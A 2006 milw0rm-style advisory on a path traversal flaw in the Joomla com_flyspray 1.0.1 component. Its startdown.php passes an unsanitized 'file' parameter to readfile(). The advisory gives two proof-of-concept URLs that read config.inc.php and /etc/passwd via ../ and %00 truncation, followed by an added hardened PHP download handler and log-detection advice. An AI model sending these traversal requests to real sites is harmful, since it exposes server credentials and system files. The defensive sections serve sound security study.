Dr Max Virus
*****************************************************************************************************************************
Component name: com_flyspray
Affected version: 1.0.1
Download page: http://mamboxchange.com/frs/download.php/8304/com_flyspray_1.0.1.zip
*****************************************************************************************************************************
Author: Dr Max Virus
Location: Egypt
*****************************************************************************************************************************
Bug in: startdown.php
Vulnerable code, line 52:
    readfile($file);
Problem: the $file variable is not sanitized, so you can read any file on the server, including the config file.
*****************************************************************************************************************************
POC:
http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=config.inc.php
http://[target]/[joomla_path]/components/com_flyspray/startdown.php?file=../../../../../etc/passwd%00
*****************************************************************************************************************************
Thx to: str0ke & Nukedx & Thehacker & all my friends
Special gr33ts: ASIANEAGLE & The Master & Kacper
****************************************************************************************************************************
# milw0rm.com [2006-11-26]
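The following PHP is an added illustration and is not code from the advisory or from the com_flyspray component: it shows the unsafe shape of line 52 next to a hardened download handler. The function names, the fixed attachments directory, and the parameter handling are assumptions made for this example.

```php
<?php
// Added example for the startdown.php issue described above.
// Function names and the attachments directory are assumptions.

// Unsafe pattern (same shape as the advisory's line 52): whatever arrives in
// the "file" parameter is handed straight to readfile().
function unsafe_download(string $file): void
{
    readfile($file);   // serves ../../../../etc/passwd, config.inc.php, anything readable
}

// Hardened version: downloads are served only from one dedicated directory,
// the request may name only a plain file inside it, and the resolved path is
// checked against that directory after realpath() has collapsed any "..".
function safe_download(string $requested, string $downloadDir): void
{
    // Reject embedded NUL bytes; old PHP versions truncated paths at \0,
    // which is what the %00 in the advisory's second PoC relies on.
    if (strpos($requested, "\0") !== false) {
        http_response_code(400);
        exit('Invalid file name');
    }

    // Keep only the file name component; any directory part is refused
    // outright, and the character set is restricted so the name is also
    // safe to echo back in a Content-Disposition header.
    $name = basename($requested);
    if ($name === '' || $name !== $requested || !preg_match('/^[A-Za-z0-9._-]+$/', $name)) {
        http_response_code(400);
        exit('Invalid file name');
    }

    $base = realpath($downloadDir);
    $path = realpath($downloadDir . DIRECTORY_SEPARATOR . $name);

    // realpath() returns false for missing files; the prefix comparison also
    // catches symlinks and ".." that basename() alone would let through.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0
        || !is_file($path)) {
        http_response_code(404);
        exit('File not found');
    }

    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename="' . $name . '"');
    header('Content-Length: ' . filesize($path));
    readfile($path);
}

// Assumed usage: the attachments directory comes from configuration, never
// from the request.
safe_download($_GET['file'] ?? '', '/var/www/joomla/components/com_flyspray/attachments');
```

The key change is that `readfile()` never sees request-controlled text: the request only selects a name, and the server decides the directory. For detection, requests to `startdown.php` whose `file` parameter contains `../`, `%00` or an absolute path are the signature of the PoCs above and are worth alerting on in web server logs.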